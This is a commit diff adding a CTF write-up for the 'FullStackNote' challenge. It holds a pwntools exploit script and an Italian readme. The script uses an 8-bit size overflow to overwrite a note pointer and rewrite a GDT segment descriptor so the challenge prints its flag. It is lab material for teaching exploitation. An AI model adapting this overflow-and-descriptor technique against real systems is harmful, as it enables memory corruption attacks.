Fullstacknote: writeup cleaning and readme

FullStackNote/exploit.py

@@ -4,7 +4,12 @@
 # $ pwn template ./sss.elf
 from pwn import *
 
+# Challange description:
+# 
+# BIOS + OS + APP to take a note and.... segmented!
+# Can you get the flag at 0x1400000 ???
 # Set up pwntools for the correct architecture
+#
 exe = context.binary = ELF(args.EXE or './sss.elf')
 context.log_level = 'debug'
 
@@ -14,7 +19,6 @@ context.log_level = 'debug'
 # ./exploit.py DEBUG NOASLR
 
 
-
 def start(argv=[], *a, **kw):
     '''Start the exploit against the target.'''
     if args.GDB:
@@ -61,25 +65,18 @@ kds_base = 0x1000000
 utok_add = 0x100000
 bytes_read = 127
 ucs_off = 0x10
-val = gdt - kds_base - utok_add - bytes_read + ucs_off
 buf_read = 0x4f2c
-flag_pos = 0x500000 * 4
-if (val < 0):
-    val = val + 2**32
+flag_pos = 0x1400000
 
 retaddr = 0x4e90
 ds_base = 0x4ef4 + 0x1100000 - retaddr
 #io = start()
 #io = process('./run.sh')
-#io = remote('localhost', 1337)
-io = remote('37.27.204.218', 1337)
+io = remote('localhost', 1337)
+
 io.recvuntil('>')
 io.sendline('1')
 io.recvuntil('note?')
-# io.send('A'*56)
-# io.send(p32(flag_pos - ds_base))
-# io.send(p32(exe.symbols['userspace_write']))
-# io.sendline(cyclic(98-56-8))
 io.sendline('D'*98)
 
 io.recvuntil('>')
@@ -87,43 +84,38 @@ io.sendline('1')
 io.recvuntil('note?')
 io.sendline('B'*98)
 
+# integer overflow on
+#    u8 new_size;
+#    ...
+#    ...
+#
+#    bytes_read = userspace_read(buf, sizeof(buf));
+#    new_size = notebook.used + bytes_read;
+#    new_size
+#
+#    will overwrite my_notebook.ptr
+
 io.recvuntil('>')
 io.sendline('1')
 io.recvuntil('note?')
 
+# overwrite my_notebook.ptr so that, accessed in kernel (so with ds = 0x10) and
+# offset to translate from kernel to user macro (APP_ADDR_TO_KERNEL_ADDR),
+# points to the gdt kernel data segment. Overwite the gdt so that kernel data
+# segment so that when printing my_notebook.data the address will point to
+# 0x1400000 (flag position, printing the flag)
 
+val = gdt - kds_base - utok_add - bytes_read + ucs_off
+if (val < 0):
+    val = val + 2**32
 io.send('CCCC')
 io.send(p32(val))
-# io.send('F'*56)
-# io.send(p32(0x10))
-# io.send(p32(flag_pos - ds_base))
-# io.send(p32(exe.symbols['userspace_write']))
-# io.send(b'G'*4)
-# io.send(p32(0x10))
-# io.send(p32(flag_pos - ds_base))
-# io.sendline(cyclic(119-56-12-12))
 io.sendline(cyclic(119))
 io.recvuntil('>')
 io.sendline('3')
 io.recvuntil('remarks')
 kds = create_seg_descriptor(flag_pos - 0x100000 - buf_read, 0xffffffff)
-ds = create_seg_descriptor(ds_base, 0xfffff)
 io.sendline(kds)
-# io.send(p32(val))
-# io.sendline(cyclic(128 - 1 - 4))
-# io.recvuntil('Inserisci la tua nota:')
-# io.sendline(cyclic(128))
-# io.send('2')
-# data = io.recvuntil('Esci')
-# print(data)
-# shellcode = asm(shellcraft.sh())
-# payload = fit({
-#     32: 0xdeadbeef,
-#     'iaaa': [1, 2, 'Hello', 3]
-# }, length=128)
-# io.send(payload)
-# flag = io.recv(...)
-# log.success(flag)
 
 io.interactive()
 

FullStackNote/readme.md

@@ -0,0 +1,20 @@
+# Sfida CTF Hack or D(y|i)e 2024
+
+## Descrizione:
+
+BIOS + OS + APP to take a note and.... segmented!
+Can you get the flag at 0x1400000 ???
+
+Per lanciare la sfida in locale:
+
+docker build -t biosnote .
+docker run -p 1337:1337 --privileged --rm --name biosnote biosnote
+
+writeup/exploit in exploit.py
+
+## Tips
+
+se usiamo gdb con qemu -S -s, gdb non traduce automaticamente gli indirizzi
+logici in indirizzi fisici usando la segmentazione. Per settare breakpoint
+calcolare l'indirizzo fisico dell'istruzione e usare break *indirizzo.
+